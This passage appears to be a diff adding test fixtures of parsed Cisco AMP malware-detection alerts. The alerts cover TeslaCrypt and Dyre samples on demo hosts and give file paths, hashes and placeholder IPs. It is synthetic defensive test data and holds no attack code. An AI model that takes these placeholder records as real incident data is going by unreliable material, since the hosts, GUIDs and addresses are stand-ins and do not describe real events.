"cisco.amp.detection_id": "6159251512150196251", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "90:61:b5:c9:13:79" + ], + "cisco.amp.timestamp_nanoseconds": 318000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6159251512150196000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "209a288c68207d57e0ce6e60ebf60729", + "file.hash.sha1": 
"e654d39cd13414b5151e8cf0d8f5b166dddd45cb", + "file.hash.sha256": "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "file.name": "rjtsbks.exe", + "file.path": "\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe", + "fileset.name": "amp", + "host.hostname": "Demo_TeslaCrypt", + "host.name": "Demo_TeslaCrypt", + "host.os.family": "windows", + "host.os.platform": "windows", + "input.type": "log", + "log.offset": 6617, + "related.hash": [ + "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "209a288c68207d57e0ce6e60ebf60729", + "e654d39cd13414b5151e8cf0d8f5b166dddd45cb" + ], + "related.hosts": [ + "Demo_TeslaCrypt" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:17:38.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "90:61:b5:c9:13:79" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6159251512150196250", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "90:61:b5:c9:13:79" + ], + "cisco.amp.timestamp_nanoseconds": 318000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6159251512150196000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "209a288c68207d57e0ce6e60ebf60729", + "file.hash.sha1": "e654d39cd13414b5151e8cf0d8f5b166dddd45cb", + "file.hash.sha256": "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "file.name": "rjtsbks.exe", + "file.path": 
"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe", + "fileset.name": "amp", + "host.hostname": "Demo_TeslaCrypt", + "host.name": "Demo_TeslaCrypt", + "host.os.family": "windows", + "host.os.platform": "windows", + "input.type": "log", + "log.offset": 7942, + "related.hash": [ + "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "209a288c68207d57e0ce6e60ebf60729", + "e654d39cd13414b5151e8cf0d8f5b166dddd45cb" + ], + "related.hosts": [ + "Demo_TeslaCrypt" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:17:38.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "90:61:b5:c9:13:79" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6159251512150196249", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "90:61:b5:c9:13:79" + ], + "cisco.amp.timestamp_nanoseconds": 303000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6159251512150196000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "209a288c68207d57e0ce6e60ebf60729", + "file.hash.sha1": "e654d39cd13414b5151e8cf0d8f5b166dddd45cb", + "file.hash.sha256": "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "file.name": "rjtsbks.exe", + "file.path": "\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe", + "fileset.name": "amp", + "host.hostname": "Demo_TeslaCrypt", + "host.name": "Demo_TeslaCrypt", + "host.os.family": "windows", 
+ "host.os.platform": "windows", + "input.type": "log", + "log.offset": 9267, + "related.hash": [ + "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "209a288c68207d57e0ce6e60ebf60729", + "e654d39cd13414b5151e8cf0d8f5b166dddd45cb" + ], + "related.hosts": [ + "Demo_TeslaCrypt" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:17:38.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "90:61:b5:c9:13:79" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6159251512150196248", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "90:61:b5:c9:13:79" + ], + "cisco.amp.timestamp_nanoseconds": 287000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6159251512150196000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "209a288c68207d57e0ce6e60ebf60729", + "file.hash.sha1": "e654d39cd13414b5151e8cf0d8f5b166dddd45cb", + "file.hash.sha256": "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "file.name": "rjtsbks.exe", + "file.path": "\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe", + "fileset.name": "amp", + "host.hostname": "Demo_TeslaCrypt", + "host.name": "Demo_TeslaCrypt", + "host.os.family": "windows", + "host.os.platform": "windows", + "input.type": "log", + "log.offset": 10592, + "related.hash": [ + "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + 
"209a288c68207d57e0ce6e60ebf60729", + "e654d39cd13414b5151e8cf0d8f5b166dddd45cb" + ], + "related.hosts": [ + "Demo_TeslaCrypt" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:17:38.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "90:61:b5:c9:13:79" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6159251512150196247", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "90:61:b5:c9:13:79" + ], + "cisco.amp.timestamp_nanoseconds": 256000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6159251512150196000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "209a288c68207d57e0ce6e60ebf60729", + "file.hash.sha1": "e654d39cd13414b5151e8cf0d8f5b166dddd45cb", + "file.hash.sha256": "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "file.name": "rjtsbks.exe", + "file.path": "\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe", + "fileset.name": "amp", + "host.hostname": "Demo_TeslaCrypt", + "host.name": "Demo_TeslaCrypt", + "host.os.family": "windows", + "host.os.platform": "windows", + "input.type": "log", + "log.offset": 11917, + "related.hash": [ + "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "209a288c68207d57e0ce6e60ebf60729", + "e654d39cd13414b5151e8cf0d8f5b166dddd45cb" + ], + "related.hosts": [ + "Demo_TeslaCrypt" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + 
"service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:17:38.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "90:61:b5:c9:13:79" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6159251512150196246", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "90:61:b5:c9:13:79" + ], + "cisco.amp.timestamp_nanoseconds": 225000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6159251512150196000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "209a288c68207d57e0ce6e60ebf60729", + "file.hash.sha1": "e654d39cd13414b5151e8cf0d8f5b166dddd45cb", + "file.hash.sha256": "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "file.name": "rjtsbks.exe", + "file.path": "\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe", + "fileset.name": "amp", + "host.hostname": "Demo_TeslaCrypt", + "host.name": "Demo_TeslaCrypt", + "host.os.family": "windows", + "host.os.platform": "windows", + "input.type": "log", + "log.offset": 13242, + "related.hash": [ + "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "209a288c68207d57e0ce6e60ebf60729", + "e654d39cd13414b5151e8cf0d8f5b166dddd45cb" + ], + "related.hosts": [ + "Demo_TeslaCrypt" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:17:38.000Z", + "cisco.amp.computer.active": true, + 
"cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "90:61:b5:c9:13:79" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6159251512150196245", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "90:61:b5:c9:13:79" + ], + "cisco.amp.timestamp_nanoseconds": 225000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6159251512150196000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "209a288c68207d57e0ce6e60ebf60729", + "file.hash.sha1": "e654d39cd13414b5151e8cf0d8f5b166dddd45cb", + "file.hash.sha256": "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "file.name": "rjtsbks.exe", + "file.path": "\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe", + "fileset.name": "amp", + "host.hostname": "Demo_TeslaCrypt", + "host.name": "Demo_TeslaCrypt", + "host.os.family": "windows", + "host.os.platform": "windows", + "input.type": "log", + "log.offset": 14567, + "related.hash": [ + "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "209a288c68207d57e0ce6e60ebf60729", + "e654d39cd13414b5151e8cf0d8f5b166dddd45cb" + ], + "related.hosts": [ + "Demo_TeslaCrypt" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:17:38.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": 
"90:61:b5:c9:13:79" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6159251512150196244", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "90:61:b5:c9:13:79" + ], + "cisco.amp.timestamp_nanoseconds": 209000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6159251512150196000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "209a288c68207d57e0ce6e60ebf60729", + "file.hash.sha1": "e654d39cd13414b5151e8cf0d8f5b166dddd45cb", + "file.hash.sha256": "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "file.name": "rjtsbks.exe", + "file.path": "\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe", + "fileset.name": "amp", + "host.hostname": "Demo_TeslaCrypt", + "host.name": "Demo_TeslaCrypt", + "host.os.family": "windows", + "host.os.platform": "windows", + "input.type": "log", + "log.offset": 15892, + "related.hash": [ + "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "209a288c68207d57e0ce6e60ebf60729", + "e654d39cd13414b5151e8cf0d8f5b166dddd45cb" + ], + "related.hosts": [ + "Demo_TeslaCrypt" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:17:38.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "90:61:b5:c9:13:79" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6159251512150196243", + 
"cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "90:61:b5:c9:13:79" + ], + "cisco.amp.timestamp_nanoseconds": 178000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6159251512150196000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "209a288c68207d57e0ce6e60ebf60729", + "file.hash.sha1": "e654d39cd13414b5151e8cf0d8f5b166dddd45cb", + "file.hash.sha256": "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "file.name": "rjtsbks.exe", + "file.path": "\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe", + "fileset.name": "amp", + "host.hostname": "Demo_TeslaCrypt", + "host.name": "Demo_TeslaCrypt", + "host.os.family": "windows", + "host.os.platform": "windows", + "input.type": "log", + "log.offset": 17217, + "related.hash": [ + "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "209a288c68207d57e0ce6e60ebf60729", + "e654d39cd13414b5151e8cf0d8f5b166dddd45cb" + ], + "related.hosts": [ + "Demo_TeslaCrypt" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:17:38.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "90:61:b5:c9:13:79" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6159251512150196242", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "90:61:b5:c9:13:79" + ], 
+ "cisco.amp.timestamp_nanoseconds": 147000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6159251512150196000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "209a288c68207d57e0ce6e60ebf60729", + "file.hash.sha1": "e654d39cd13414b5151e8cf0d8f5b166dddd45cb", + "file.hash.sha256": "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "file.name": "rjtsbks.exe", + "file.path": "\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe", + "fileset.name": "amp", + "host.hostname": "Demo_TeslaCrypt", + "host.name": "Demo_TeslaCrypt", + "host.os.family": "windows", + "host.os.platform": "windows", + "input.type": "log", + "log.offset": 18542, + "related.hash": [ + "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "209a288c68207d57e0ce6e60ebf60729", + "e654d39cd13414b5151e8cf0d8f5b166dddd45cb" + ], + "related.hosts": [ + "Demo_TeslaCrypt" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:17:38.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "90:61:b5:c9:13:79" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6159251512150196241", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "90:61:b5:c9:13:79" + ], + "cisco.amp.timestamp_nanoseconds": 69000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 
6159251512150196000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "209a288c68207d57e0ce6e60ebf60729", + "file.hash.sha1": "e654d39cd13414b5151e8cf0d8f5b166dddd45cb", + "file.hash.sha256": "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "file.name": "rjtsbks.exe", + "file.path": "\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe", + "fileset.name": "amp", + "host.hostname": "Demo_TeslaCrypt", + "host.name": "Demo_TeslaCrypt", + "host.os.family": "windows", + "host.os.platform": "windows", + "input.type": "log", + "log.offset": 19867, + "related.hash": [ + "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "209a288c68207d57e0ce6e60ebf60729", + "e654d39cd13414b5151e8cf0d8f5b166dddd45cb" + ], + "related.hosts": [ + "Demo_TeslaCrypt" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:17:38.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "90:61:b5:c9:13:79" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6159251512150196240", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "90:61:b5:c9:13:79" + ], + "cisco.amp.timestamp_nanoseconds": 69000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6159251512150196000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "209a288c68207d57e0ce6e60ebf60729", + "file.hash.sha1": 
"e654d39cd13414b5151e8cf0d8f5b166dddd45cb", + "file.hash.sha256": "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "file.name": "rjtsbks.exe", + "file.path": "\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe", + "fileset.name": "amp", + "host.hostname": "Demo_TeslaCrypt", + "host.name": "Demo_TeslaCrypt", + "host.os.family": "windows", + "host.os.platform": "windows", + "input.type": "log", + "log.offset": 21191, + "related.hash": [ + "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "209a288c68207d57e0ce6e60ebf60729", + "e654d39cd13414b5151e8cf0d8f5b166dddd45cb" + ], + "related.hosts": [ + "Demo_TeslaCrypt" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:17:37.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "23:d5:92:eb:f8:9b" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "GenericKD:Dyreza-tpd", + "cisco.amp.detection_id": "6176259080131182683", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "23:d5:92:eb:f8:9b" + ], + "cisco.amp.timestamp_nanoseconds": 996000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6176259080131183000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", + "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", + "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "file.name": "webinstall.exe", + "file.path": 
"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Dyre", + "host.name": "Demo_Dyre", + "input.type": "log", + "log.offset": 22515, + "related.hash": [ + "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "e9d8c15e7d18678dd41771f72ed6693c", + "ec80314ae4a2817be806b7ae27dbdb31a88226a0" + ], + "related.hosts": [ + "Demo_Dyre" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:17:37.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "90:61:b5:c9:13:79" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6159251507855228943", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "90:61:b5:c9:13:79" + ], + "cisco.amp.timestamp_nanoseconds": 944000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6159251507855229000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "209a288c68207d57e0ce6e60ebf60729", + "file.hash.sha1": "e654d39cd13414b5151e8cf0d8f5b166dddd45cb", + "file.hash.sha256": "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "file.name": "rjtsbks.exe", + "file.path": "\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe", + "fileset.name": "amp", + "host.hostname": "Demo_TeslaCrypt", + "host.name": "Demo_TeslaCrypt", + "host.os.family": "windows", + "host.os.platform": "windows", + "input.type": "log", + "log.offset": 23834, + 
"related.hash": [ + "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "209a288c68207d57e0ce6e60ebf60729", + "e654d39cd13414b5151e8cf0d8f5b166dddd45cb" + ], + "related.hosts": [ + "Demo_TeslaCrypt" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:17:37.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "90:61:b5:c9:13:79" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.3372C1EDAB-100.SBX.TG", + "cisco.amp.detection_id": "6159251503560261641", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "90:61:b5:c9:13:79" + ], + "cisco.amp.timestamp_nanoseconds": 8000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6159251507855229000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "209a288c68207d57e0ce6e60ebf60729", + "file.hash.sha1": "e654d39cd13414b5151e8cf0d8f5b166dddd45cb", + "file.hash.sha256": "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "file.name": "rjtsbks.exe", + "file.path": "\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe", + "fileset.name": "amp", + "host.hostname": "Demo_TeslaCrypt", + "host.name": "Demo_TeslaCrypt", + "host.os.family": "windows", + "host.os.platform": "windows", + "input.type": "log", + "log.offset": 25159, + "related.hash": [ + "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "209a288c68207d57e0ce6e60ebf60729", + "e654d39cd13414b5151e8cf0d8f5b166dddd45cb" + ], + 
"related.hosts": [ + "Demo_TeslaCrypt" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:17:36.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "90:61:b5:c9:13:79" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.3372C1EDAB-100.SBX.TG", + "cisco.amp.detection_id": "6159251503560261640", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "90:61:b5:c9:13:79" + ], + "cisco.amp.timestamp_nanoseconds": 821000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6159251503560262000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "209a288c68207d57e0ce6e60ebf60729", + "file.hash.sha1": "e654d39cd13414b5151e8cf0d8f5b166dddd45cb", + "file.hash.sha256": "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "file.name": "t.exe", + "file.path": "\\\\?\\C:\\t.exe", + "fileset.name": "amp", + "host.hostname": "Demo_TeslaCrypt", + "host.name": "Demo_TeslaCrypt", + "host.os.family": "windows", + "host.os.platform": "windows", + "input.type": "log", + "log.offset": 26489, + "related.hash": [ + "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + 